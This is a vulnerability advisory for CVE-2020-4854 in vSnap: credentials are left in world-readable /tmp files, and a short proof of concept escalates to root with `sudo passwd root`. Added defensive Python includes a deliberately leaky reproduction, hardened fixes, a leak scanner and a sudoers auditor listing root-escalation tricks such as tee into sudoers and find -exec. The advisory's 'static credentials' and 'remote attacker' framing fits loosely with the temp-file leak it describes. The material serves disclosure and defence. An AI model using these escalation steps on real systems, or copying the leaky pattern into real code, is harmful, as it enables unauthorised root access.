CVE-2020-4854: Static credentials vulnerability
When the vSnap API authenticates a user, the username and password are written to a temporary file in /tmp whose name has the form vsnap-<pid>-<timestamp>-<uuid>-in.txt:
def check_password(username, password):
    code, _ = system.run_shell_command(('%s/python3 -m simplepam' % const.VENV_BIN_DIR),
                                       use_sudo=True, cmd_input=[username, password],
                                       ignore_error=True, log_error_as=(logging.ERROR))
    if code != 0:
        raise errors.AuthenticationError()

[...]

[...]

def run_shell_command(command, cmd_input=None, use_sudo=False, sudo_user='root', sudo_login=False,
                      timeout=480, ignore_error=False, log_error_as=logging.WARN,
                      log_cmd_as=logging.DEBUG, output_to_file=False, mask_text=[],
                      strip_lines=True, env=None, kill_on_timeout=True, progressfn=None):
    timed_out = False
    aborted = False
    uid = uuid.uuid4().hex
    outfile_name = '/tmp/vsnap-%s-%s-%s-out.txt' % (os.getpid(), int(time.time()), uid)
    outfile = open(outfile_name, 'w')
    outfile.flush()
    if cmd_input is not None:
        infile_name = '/tmp/vsnap-%s-%s-%s-in.txt' % (os.getpid(), int(time.time()), uid)
        infile = open(infile_name, 'w')
        for line in cmd_input:
            infile.write(line + '\n')
    [...]
    # still in vsnap.linux.system.run_shell_command
    logger.log(log_cmd_as, 'Executing command: ' + log_command_full)
    proc = subprocess.[...]
After authentication the temporary file is supposed to be deleted; the cleanup code in vsnap.linux.system.run_shell_command() looks like this:
    if infile:
        infile.close()
        os.remove(infile_name)
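Two defects are visible in the listing above: the input file is created with a plain open(), so its mode is 0666 & ~umask (0644 on a default system, which is what the ls output below shows), and the os.remove() only runs on the success path, so any exception or early return between the write and the cleanup leaves the credentials on disk. The following is an added example, not vSnap's code or part of this advisory: run_with_input_leaky() recreates that pattern, and the two *_hardened() variants show the fix, either passing the secret through a pipe so it never touches the filesystem, or, where a file is unavoidable, creating it with tempfile.mkstemp (mode 0600, O_EXCL, unpredictable name) and removing it in a finally block. Function names and the stand-in commands are mine.

```python
import os
import subprocess
import sys
import tempfile

# Added example, not vSnap's code. run_with_input_leaky() recreates the pattern
# from the advisory's listing; the two *_hardened() functions show the fix.


def run_with_input_leaky(command, cmd_input, tmp_dir="/tmp"):
    """Write cmd_input to a file in tmp_dir and feed it to command on stdin.
    Two defects, copied from the pattern above: the file is created with
    open(), so its mode is 0666 & ~umask (0644 under the usual umask 022),
    and it is only removed on the success path."""
    infile_name = os.path.join(tmp_dir, "vsnap-%d-%s-in.txt" % (os.getpid(), os.urandom(8).hex()))
    with open(infile_name, "w") as infile:
        for line in cmd_input:
            infile.write(line + "\n")
    with open(infile_name) as stdin:
        proc = subprocess.run(command, stdin=stdin, capture_output=True, text=True)
    if proc.returncode != 0:
        raise RuntimeError("command failed")   # leaves the password on disk
    os.remove(infile_name)
    return proc.stdout


def run_with_input_hardened(command, cmd_input, timeout=480):
    """Preferred fix: the secret goes through a pipe and never touches disk."""
    data = "".join(line + "\n" for line in cmd_input)
    proc = subprocess.run(command, input=data, capture_output=True, text=True, timeout=timeout)
    return proc.returncode, proc.stdout


def run_with_input_file_hardened(command, cmd_input, timeout=480):
    """If a file is unavoidable: mkstemp creates it 0600 with O_EXCL and an
    unpredictable name, and the finally block removes it on every exit path."""
    fd, path = tempfile.mkstemp(prefix="vsnap-", suffix="-in.txt")
    try:
        with os.fdopen(fd, "w") as f:
            f.write("".join(line + "\n" for line in cmd_input))
        with open(path) as stdin:
            proc = subprocess.run(command, stdin=stdin, capture_output=True, text=True, timeout=timeout)
        return proc.returncode, proc.stdout
    finally:
        os.remove(path)


# Constructed stand-ins for "python3 -m simplepam": one echoes stdin, one fails.
ECHO_STDIN = [sys.executable, "-c", "import sys; sys.stdout.write(sys.stdin.read())"]
FAIL = [sys.executable, "-c", "import sys; sys.stdin.read(); sys.exit(1)"]


def demo_leak():
    """Run the leaky variant against a failing command in a private scratch
    directory and return what it left behind as [(name, mode, contents)]."""
    scratch = tempfile.mkdtemp()
    try:
        try:
            run_with_input_leaky(FAIL, ["admin", "BADPASSWORD"], tmp_dir=scratch)
        except RuntimeError:
            pass
        leftovers = []
        for name in sorted(os.listdir(scratch)):
            path = os.path.join(scratch, name)
            with open(path) as f:
                leftovers.append((name, oct(os.stat(path).st_mode & 0o777), f.read()))
        return leftovers
    finally:
        for name in os.listdir(scratch):
            os.remove(os.path.join(scratch, name))
        os.rmdir(scratch)


if __name__ == "__main__":
    print(demo_leak())
    print(run_with_input_hardened(ECHO_STDIN, ["admin", "BADPASSWORD"]))
    print(run_with_input_file_hardened(ECHO_STDIN, ["admin", "BADPASSWORD"]))
```

The pipe variant is the one to prefer: it removes the file from the design entirely, so there is nothing to clean up, no mode to get right and no window in which another local user can read the credentials.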
For reasons that are not clear, on some authentication runs the temporary file is not deleted. The leftover files are owned by root but world-readable, which exposes the password to the vsnap user:
[vsnap@spp ~]$ ls -l /tmp/vsnap-*-in.txt
-rw-r--r-- 1 root root 19 [...] /tmp/vsnap-6738-1601580[...]-e5c27e43db9440bce84d0297c2d[...]-in.txt
-rw-r--r-- 1 root root 19 Oct  1 05:58 /tmp/vsnap-7139-160154693[...]-17e3855a3f044e45b588b15c0ef38b[...]-in.txt
-rw-r--r-- 1 root root 19 Oct  1 12:53 /tmp/vsnap-7140-16011793[...]-c63808a4e484f99a0c01112dfb9[...]-in.txt
-rw-r--r-- 1 root root 19 Oct  1 12:53 /tmp/vsnap-7154-160119324c3d439c226c7d447305b[...]-in.txt
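A hygiene check for such leftovers, added here as an example and not taken from vSnap or from the advisory: find_leaked_inputs() lists the regular files in a directory that match vsnap-*-in.txt and records mode, owner, size and age, and exposed() keeps those readable by group or others. demo() runs it over a constructed fixture of two files in a private scratch directory instead of the real /tmp; the file names, contents and the function names are mine. On a host the call is simply find_leaked_inputs("/tmp").

```python
import glob
import os
import stat
import tempfile
import time
from typing import Dict, List, Optional

# Added example, not vSnap's code: a hygiene check for the leftover input files
# described in the advisory. On a real host call find_leaked_inputs("/tmp").


def find_leaked_inputs(directory: str, pattern: str = "vsnap-*-in.txt",
                       now: Optional[float] = None) -> List[Dict[str, object]]:
    """Describe every regular file in directory matching pattern, with the
    permission bits that decide who else can read the credentials inside."""
    now = time.time() if now is None else now
    findings = []
    for path in sorted(glob.glob(os.path.join(directory, pattern))):
        st = os.lstat(path)                # lstat: do not follow symlinks planted in /tmp
        if not stat.S_ISREG(st.st_mode):
            continue
        mode = stat.S_IMODE(st.st_mode)
        findings.append({
            "path": path,
            "mode": "%04o" % mode,
            "uid": st.st_uid,
            "size": st.st_size,
            "age_s": int(now - st.st_mtime),
            "group_readable": bool(mode & stat.S_IRGRP),
            "world_readable": bool(mode & stat.S_IROTH),
        })
    return findings


def exposed(findings: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Subset readable by anyone other than the owner."""
    return [f for f in findings if f["group_readable"] or f["world_readable"]]


def demo() -> List[Dict[str, object]]:
    """Constructed fixture in a private scratch directory: one file with the
    0644 mode that open() produces under umask 022, one created 0600."""
    scratch = tempfile.mkdtemp(prefix="vsnap-demo-")
    # constructed names in the vsnap-<pid>-<timestamp>-<uuid>-in.txt format
    leaky = os.path.join(scratch, "vsnap-6738-1601580000-0123456789abcdef0123456789abcdef-in.txt")
    tight = os.path.join(scratch, "vsnap-7139-1601546930-fedcba9876543210fedcba9876543210-in.txt")
    try:
        for path in (leaky, tight):
            with open(path, "w") as f:
                f.write("admin\nBADPASSWORD\n")     # constructed credential pair
        os.chmod(leaky, 0o644)
        os.chmod(tight, 0o600)
        return exposed(find_leaked_inputs(scratch))
    finally:
        for path in (leaky, tight):
            if os.path.exists(path):
                os.remove(path)
        os.rmdir(scratch)


if __name__ == "__main__":
    for f in demo():
        print(f)
```

The sticky bit on /tmp only stops other users from deleting or renaming the files; it does nothing about reading them, which is why the mode bits are the thing to check.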
An unauthenticated remote attacker can use the static credentials to log in over SSH to the SPP host's vSnap as the vsnap user and then switch to root, because the vsnap user is allowed to change the root password via sudo:
Proof of concept
[vsnap@spp ~]$ id
uid=991(vsnap) gid=987(vsnap) groups=987(vsnap) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[vsnap@spp ~]$
[vsnap@spp ~]$ sudo -l
Matching Defaults entries for vsnap on spp:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset,
    env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin, !requiretty,
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin, env_keep+=VS_OFFLOAD_ROOTDIR,
    env_keep+=VS_OFFLOAD_POOL, env_keep+=VS_OFFLOAD_DEVICE_PATH, env_keep+=VS_OFFLOAD_POOLCACHE,
    env_keep+=VS_OFFLOAD_STAGE, env_keep+=VS_OFFLOAD_SESSID

User vsnap may run the following commands on spp:
    (root) NOPASSWD: /opt/vsnap/venv/bin/python3 /opt/vsnap/lib/vsnap/cli/*
    (ALL) NOPASSWD: /usr/bin/mkdir, /usr/bin/rmdir, /usr/bin/chown, /usr/bin/chmod, /usr/bin/id,
        /usr/bin/cp, /usr/bin/rm, /usr/bin/kill, /usr/bin/systemctl, /usr/bin/readlink, /usr/bin/stat,
        /usr/sbin/fuser, /usr/bin/truncate, /usr/bin/tee, /bin/iostat, /usr/bin/df, /usr/bin/find,
        /usr/bin/cat, /usr/bin/mv, /usr/bin/gzip, /usr/bin/gunzip, /usr/bin/ln, /usr/bin/du,
        /usr/bin/tar, /usr/bin/mount, /usr/bin/umount, /usr/sbin/mkfs, /usr/bin/lsblk, /usr/bin/star,
        /usr/bin/file, /usr/bin/ps, /usr/bin/grep, /usr/sbin/useradd, /usr/sbin/userdel,
        /usr/sbin/usermod, /usr/bin/passwd, /usr/bin/smbpasswd, /usr/bin/net, /usr/bin, /usr/bin/yum,
        /usr/sbin/modprobe, /usr/sbin/parted, /usr/bin/dd, /usr/bin/rescan-scsi-bus.sh,
        /usr/sbin/blkid, /usr/sbin/pvs, /usr/sbin/gdisk, /lib/udev/scsi_id, /usr/sbin/wipefs,
        /usr/sbin/partprobe, /sbin/cryptsetup, /usr/sbin/zpool, /usr/sbin/zfs, /usr/sbin/zdb,
        /usr/bin/vsnap_targetcli /usr/bin/vsnap_targetctl, /opt/vsnap/venv/bin/python3 -m simplepam,
        /usr/bin/mongoimport, /opt/vsnap/bin/logcollect, /opt/vsnap/bin/logcollect_v2,
        /opt/vsnap/bin/restore_config, /usr/bin/update-ca-trust, /opt/vsnap/bin/blockmaputil,
        /opt/vsnap/bin/offload_hook, /opt/vsnap/bin/tar
[vsnap@spp ~]$
[vsnap@spp ~]$ sudo passwd root
Changing password for user root.
New password:
BAD PASSWORD: The password contains less than 1 non-digit characters
[...]
[vsnap@spp ~]$ su
[...]
[root@spp vsnap]#
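The sudoers policy is the second half of the chain: once a shell as vsnap exists, passwd is only the most direct route, since the same NOPASSWD list also grants tee, cp, dd, find, tar, useradd, usermod and an interpreter, any one of which is enough for root. As an added example, not from the advisory or from the product, the following parses the text that sudo -l prints and flags entries in that class. SAMPLE_SUDO_L is a constructed excerpt of the listing above with most of the harmless entries dropped, ESCALATION is my own list of reasons, and the function names are mine.

```python
import re
from typing import Dict, List

# Added example, not part of the advisory or of the vSnap code base.
# SAMPLE_SUDO_L is a constructed excerpt of the `sudo -l` output in the PoC.
SAMPLE_SUDO_L = """\
Matching Defaults entries for vsnap on spp:
    !visiblepw, always_set_home, env_reset, !requiretty

User vsnap may run the following commands on spp:
    (root) NOPASSWD: /opt/vsnap/venv/bin/python3 /opt/vsnap/lib/vsnap/cli/*
    (ALL) NOPASSWD: /usr/bin/mkdir, /usr/bin/rmdir, /usr/bin/chmod, /usr/bin/cp,
        /usr/bin/tee, /usr/bin/find, /usr/bin/tar, /usr/bin/cat, /usr/sbin/useradd,
        /usr/sbin/usermod, /usr/bin/passwd, /opt/vsnap/venv/bin/python3 -m simplepam
"""

# Why a root-as-target entry for this binary is a privilege escalation (my own
# list of the classic primitives; extend it for your baseline).
ESCALATION = {
    "passwd":    "sets any account's password, including root's",
    "useradd":   "useradd -o -u 0 creates a second uid 0 account",
    "usermod":   "adds the caller to wheel/root or changes its uid",
    "python3":   "interpreter: arbitrary code as the target user",
    "tee":       "writes any root-owned file, e.g. /etc/sudoers.d/x",
    "cp":        "overwrites any root-owned file",
    "mv":        "replaces any root-owned file",
    "dd":        "writes any root-owned file or raw block device",
    "find":      "-exec runs arbitrary commands",
    "tar":       "--checkpoint-action=exec runs arbitrary commands",
    "chmod":     "can make /etc/shadow or a setuid binary writable",
    "chown":     "can take ownership of any root-owned file",
    "cat":       "reads any file, e.g. /etc/shadow",
    "mount":     "mounts attacker-controlled filesystems over system paths",
    "systemctl": "starts units; with any file-write primitive that is a root shell",
    "yum":       "plugins run arbitrary Python as root",
    "modprobe":  "a custom config file's install= directive runs commands",
}

ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<rest>.*)$")
TAG_RE = re.compile(r"^(?:[A-Z]+:\s*)+")


def parse_sudo_l(text: str) -> List[Dict[str, object]]:
    """One record per command in the 'may run the following commands' section.
    Indented lines that do not start with a runas spec are joined to the
    preceding entry, which also absorbs the line wrapping seen in the PoC."""
    entries: List[Dict[str, str]] = []
    in_cmds = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_cmds = True
            continue
        if not in_cmds or not line.strip():
            continue
        m = ENTRY_RE.match(line)
        if m:
            entries.append({"runas": m.group("runas").strip(), "rest": m.group("rest").strip()})
        elif entries:
            entries[-1]["rest"] += " " + line.strip()
    records: List[Dict[str, object]] = []
    for e in entries:
        tm = TAG_RE.match(e["rest"])                      # NOPASSWD:, SETENV:, ...
        tags = {t.rstrip(":") for t in tm.group(0).split()} if tm else set()
        cmds = e["rest"][tm.end():] if tm else e["rest"]
        for cmd in (c.strip() for c in cmds.split(",")):
            if cmd:
                records.append({"runas": e["runas"], "tags": tags, "command": cmd})
    return records


def audit_sudo_l(text: str) -> List[Dict[str, object]]:
    """Flag commands that let the caller become root or read root-only data."""
    findings = []
    for rec in parse_sudo_l(text):
        cmd = str(rec["command"])
        name = cmd.split()[0].rsplit("/", 1)[-1]
        reasons = []
        if name in ESCALATION:
            reasons.append(ESCALATION[name])
        if "*" in cmd:
            # sudoers matches argument wildcards with fnmatch and, unlike in the
            # command path, a '*' in an argument also matches '/', so '..'
            # traversal and extra arguments slip through.
            reasons.append("wildcard in arguments")
        if reasons:
            findings.append({"runas": rec["runas"], "nopasswd": "NOPASSWD" in rec["tags"],
                             "command": cmd, "why": "; ".join(reasons)})
    return findings


if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        flag = "NOPASSWD" if f["nopasswd"] else "        "
        print("%-5s %s %s  <- %s" % (f["runas"], flag, f["command"], f["why"]))
```

Interpreter entries with fixed arguments, such as python3 -m simplepam, are flagged as well and need a manual look: sudo pins the argument list, so they are only exploitable through what the fixed arguments themselves do (module search path, writable script directories), not directly.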